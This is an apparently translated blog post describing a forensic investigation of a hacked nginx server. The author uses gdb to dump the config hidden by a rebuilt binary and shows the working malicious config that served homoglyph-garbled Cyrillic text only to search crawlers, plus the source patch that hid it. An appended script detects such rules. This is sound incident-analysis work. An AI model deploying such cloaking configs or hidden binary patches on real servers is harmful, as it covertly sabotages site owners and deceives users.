When 'а' is not equal to 'a'. In the wake of a hack

An unpleasant story happened to one of my acquaintances. But as unpleasant as it was for Mikhail, it turned out to be just as entertaining for me.

I should say that my friend is quite a capable UNIX user: he can install MySQL and PHP on his own and do a simple nginx setup.
And he has ten or fifteen websites devoted to power tools.

One of these sites, devoted to chainsaws, sits firmly at the top of the search engine results. The site is a non-commercial review site, but someone has got into the habit of attacking it: now a DDoS, now brute force, now offensive comments and abuse reports sent to the hosting provider and to the RKN.
Suddenly everything calmed down, and this lull turned out to be for the worse: the site gradually began to slip from the top lines of the search results.


That was the preamble; now for the admin's own account.

It was getting close to bedtime when the phone rang: "Sanya, won't you take a look at my server? It seems to me I've been hacked. I can't prove it, but the feeling hasn't left me for the third week now. Maybe it's just time for me to get treated for paranoia?"

What followed was a half-hour conversation that can be summarised as follows:

  • the ground for a hack was very fertile;
  • the attacker could have obtained superuser rights;
  • the attack (if it did happen) was aimed specifically at this site;
  • the problem areas have already been fixed, and all that remains is to understand whether there was an intrusion;
  • the hack could not have affected the site code and the databases.

Regarding the last point.


Only the white (public) IP of the frontend faces the world. There is no exchange between the backends and the frontend other than http(s), the users/passwords are different, and no keys were exchanged. On the grey (private) addresses all ports except 80/443 are closed. The white IPs of the backends are known only to two users, whom Mikhail fully trusts.

Debian 9 is installed on the frontend, and at the time of the call the system had been isolated from the world by an external firewall and stopped.

"Ok, give me access," I decided to put off sleep for an hour. "I'll take a look with my own eyes."

Here and below:

$ grep -F PRETTY_NAME /etc/*releas*
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
$ `echo $SHELL` --version
GNU bash, version 4.4.12(1)-release (x86_64-pc-linux-gnu)
$ nginx -v
nginx version: nginx/1.10.3
$ gdb --version
GNU gdb (Debian 8.2.1-2) 8.2.1

Looking for a possible hack

I start the server, first in rescue mode. I mount the disks and look through the auth logs, the shell history, the system logs and so on; where possible I check file creation dates, although I understand that a competent cracker would have "swept up" after himself, and Misha had already "trampled" a lot while searching on his own.

I boot in normal mode and, still not really understanding what to look for, study the configs. First of all I'm interested in nginx, since, in general, there is nothing else on the frontend besides it.
The configs are small and well laid out across a dozen files; I just look through them one by one with cat. Everything seems clean, but who knows whether I missed some include, so let me make a full listing:

$ nginx -T
nginx: the configuration file /usr/local/etc/nginx/nginx.conf syntax is ok
nginx: configuration file /usr/local/etc/nginx/nginx.conf test is successful

I don't understand: "Where's the listing?"

$ nginx -V
nginx version: nginx/1.10.3
TLS SNI support enabled
configure arguments: --with-cc-opt='-g -O2' --with-ld-opt='-Wl,-z,relro -Wl,-z,now' --prefix=/usr/share/nginx --conf-path=/etc/nginx/nginx.conf --http-log-path=/var/log/nginx/access.log --error-log-path=/var/log/nginx/error.log --lock-path=/var/lock/nginx.lock --pid-path=/run/nginx.pid --modules-path=/usr/lib/nginx/modules --http-client-body-temp-path=/var/lib/nginx/body --http-fastcgi-temp-path=/var/lib/nginx/fastcgi --http-proxy-temp-path=/var/lib/nginx/proxy --http-scgi-temp-path=/var/lib/nginx/scgi --http-uwsgi-temp-path=/var/lib/nginx/uwsgi --with-debug --with-pcre-jit --with-ipv6 --with-http_ssl_module --with-http_stub_status_module --with-http_realip_module --with-http_auth_request_module --with-http_v2_module --with-http_dav_module --with-http_slice_module --with-threads --with-http_addition_module --with-http_gunzip_module --with-http_gzip_static_module --with-http_sub_module --with-stream=dynamic --with-stream_ssl_module --with-mail=dynamic --with-mail_ssl_module

A second question was added to the list: "Why such an old version of nginx?"

Moreover, the system believes that the current version is installed:

$ dpkg -l nginx | grep "[n]ginx"
ii  nginx          1.14.2-2+deb10u1 all          small, powerful, scalable web/proxy server

I call:
- Misha, why did you rebuild nginx?
- Wait, I don't even know how that's done!
- Ok, go to sleep...

Nginx has clearly been rebuilt, and the listing output for "-T" has been hidden for some reason. There is no longer any doubt about the hack; one could simply accept it and (since Misha replaced the server with a new one anyway) consider the problem solved.

And indeed, once someone has obtained root rights, the only sensible thing is to reinstall the system, and it is pointless to look for what is wrong there; but this time curiosity overcame sleep. How can we find out what they wanted to hide from us?

Let's try tracing:

$ strace nginx -T

We look at it: there are clearly not enough lines in the trace, no lines à la

write(1, "/etc/nginx/nginx.conf", 21/etc/nginx/nginx.conf)   = 21
write(1, "...
write(1, "\n", 1

Just for interest, let's compare the results.

$ strace nginx -T 2>&1 | wc -l
264
$ strace nginx -t 2>&1 | wc -l
264

I think that this part of the code in /src/core/nginx.c

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 1;
                break;

has been brought to the form:

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                //ngx_dump_config = 1;
                break;

or

            case 't':
                ngx_test_config = 1;
                break;

            case 'T':
                ngx_test_config = 1;
                ngx_dump_config = 0;
                break;

so the listing for "-T" is not printed.

But how then can we look at our config?

If my guess is right and the problem is only in the ngx_dump_config variable, let's try to set it using gdb; luckily the build has the --with-cc-opt '-g' flag, and we hope that the -O2 optimization won't get in our way. At the same time, since I don't know how ngx_dump_config might be handled in case 'T':, we won't go through that block but will set the variable while using case 't':

Why both '-t' and '-T' can be used

The if(ngx_dump_config) block is processed inside if(ngx_test_config):

    if (ngx_test_config) {
        if (!ngx_quiet_mode) {
            ngx_log_stderr(0, "configuration file %s test is successful",
                           cycle->conf_file.data);
        }

        if (ngx_dump_config) {
            cd = cycle->config_dump.elts;

            for (i = 0; i < cycle->config_dump.nelts; i++) {

                ngx_write_stdout("# configuration file ");
                (void) ngx_write_fd(ngx_stdout, cd[i].name.data,
                                    cd[i].name.len);
                ngx_write_stdout(":" NGX_LINEFEED);

                b = cd[i].buffer;

                (void) ngx_write_fd(ngx_stdout, b->pos, b->last - b->pos);
                ngx_write_stdout(NGX_LINEFEED);
            }
        }

        return 0;
    }

Naturally, if the code was changed in this section and not in case 'T':, then my method won't work.

Test nginx.conf

After the test problem was solved, a minimal configuration in nginx format was created for the malware to run with:

events {
}

http {
	include /etc/nginx/sites-enabled/*;
}

We will use it for brevity in the article.

Launching the debugger

$ gdb --silent --args nginx -t
Reading symbols from nginx...done.
(gdb) break main
Breakpoint 1 at 0x1f390: file src/core/nginx.c, line 188.
(gdb) run
Starting program: nginx -t
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

Breakpoint 1, main (argc=2, argv=0x7fffffffebc8) at src/core/nginx.c:188
188     src/core/nginx.c: No such file or directory.
(gdb) print ngx_dump_config=1
$1 = 1
(gdb) continue
Continuing.
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
# configuration file /etc/nginx/nginx.conf:
events {
}

http {
map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

        include /etc/nginx/sites-enabled/*;
}
# configuration file /etc/nginx/sites-enabled/default:

[Inferior 1 (process 32581) exited normally]
(gdb) quit

Steps:

  • set a breakpoint in the main() function
  • run the program
  • change the value of the variable that controls the config output: ngx_dump_config=1
  • continue / finish the program

As we can see, the real config differs from ours; let's pick the parasitic section out of it:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Let's go through what happens here, in order.

The yandex/google User-Agents are identified:

map $http_user_agent $sign_user_agent
{
"~*yandex.com/bots" 1;
"~*www.google.com/bot.html" 1;
default 0;
}

The WordPress service pages are excluded:

map $uri $sign_uri
{
"~*/wp-" 1;
default 0;
}

And for those who fall under both of the conditions above

map о:$sign_user_agent:$sign_uri $sign_o
{
о:1:0 o;
default о;
}

map а:$sign_user_agent:$sign_uri $sign_a
{
а:1:0 a;
default а;
}

in the text of the HTML pages Cyrillic 'о' is replaced with Latin 'o' and Cyrillic 'а' with Latin 'a':

sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;

Yes, the only subtlety is that Cyrillic 'а' is not the same character as Latin 'a', and the same goes for 'о' and 'o':


So, instead of normal 100% Cyrillic text, the search engine bots received garbage diluted with Latin 'a' and 'o'. I won't guess how exactly this affects SEO, but a jumble of characters is unlikely to have a positive effect on the position in the search results.
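Two checks a defender can run to spot this kind of cloaking without a debugger, as an added example that is not code from the article: one scans an nginx config dump for sub_filter directives that rewrite single Cyrillic letters, the other compares the body served to a browser with the body served to a crawler User-Agent and lists words that mix Cyrillic and Latin letters. The config lines and page bodies are constructed sample data; the function names are my own.

```python
import re

CYRILLIC = re.compile(r"[\u0400-\u04FF]")
LATIN = re.compile(r"[A-Za-z]")
WORD = re.compile(r"\w+")  # \w matches Cyrillic letters too in Python 3
# sub_filter '<needle>' <replacement>;  (single-quoted needle, as in the dump above)
SUB_FILTER = re.compile(r"sub_filter\s+'([^']*)'\s+([^;]+?)\s*;")


def single_letter_sub_filters(config_dump):
    """sub_filter directives from an `nginx -T` dump whose needle is a single
    Cyrillic letter. Legitimate sub_filter use rewrites URLs or tags, never
    individual letters, so any hit deserves a look."""
    return [(needle, repl) for needle, repl in SUB_FILTER.findall(config_dump)
            if len(needle) == 1 and CYRILLIC.match(needle)]


def mixed_script_words(text):
    """Words containing both Cyrillic and Latin letters. Genuine Russian text
    has none; after the sub_filter rules every word with 'а' or 'о' becomes mixed."""
    return [w for w in WORD.findall(text) if CYRILLIC.search(w) and LATIN.search(w)]


def cloaking_diff(browser_body, bot_body):
    """Positions where the two bodies differ, as (index, browser_char, bot_char).
    A length mismatch is reported as a final entry with None on the shorter side."""
    diff = [(i, x, y) for i, (x, y) in enumerate(zip(browser_body, bot_body)) if x != y]
    if len(browser_body) != len(bot_body):
        n = min(len(browser_body), len(bot_body))
        diff.append((n, browser_body[n:n + 1] or None, bot_body[n:n + 1] or None))
    return diff


# Constructed sample data (not captured from the server in the article).
CONFIG_DUMP = """
sub_filter_once off;
sub_filter 'о' $sign_o;
sub_filter 'а' $sign_a;
sub_filter 'http://' 'https://';
"""
BROWSER_BODY = "<p>Бензопила для дома</p>"
# What a crawler would receive: Cyrillic о/а swapped for Latin o/a, as the maps above do.
BOT_BODY = BROWSER_BODY.translate(str.maketrans({"о": "o", "а": "a"}))

if __name__ == "__main__":
    print("suspicious sub_filter:", single_letter_sub_filters(CONFIG_DUMP))
    print("mixed-script words:", mixed_script_words(BOT_BODY))
    for i, x, y in cloaking_diff(BROWSER_BODY, BOT_BODY):
        print(f"offset {i}: U+{ord(x):04X} -> U+{ord(y):04X}")
```

In practice the two bodies come from fetching the same URL twice, once with a normal browser User-Agent and once with a Googlebot or YandexBot User-Agent string; any non-empty diff on a static page is the signal.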

What can I say, guys with imagination.

Links

Debugging nrog GDB
gdb(1) — Linux man page
strace(1) — Linux man page
Nginx — Module ngx_http_sub_module
About saws, chainsaws and electric saws

Source: www.hab.com
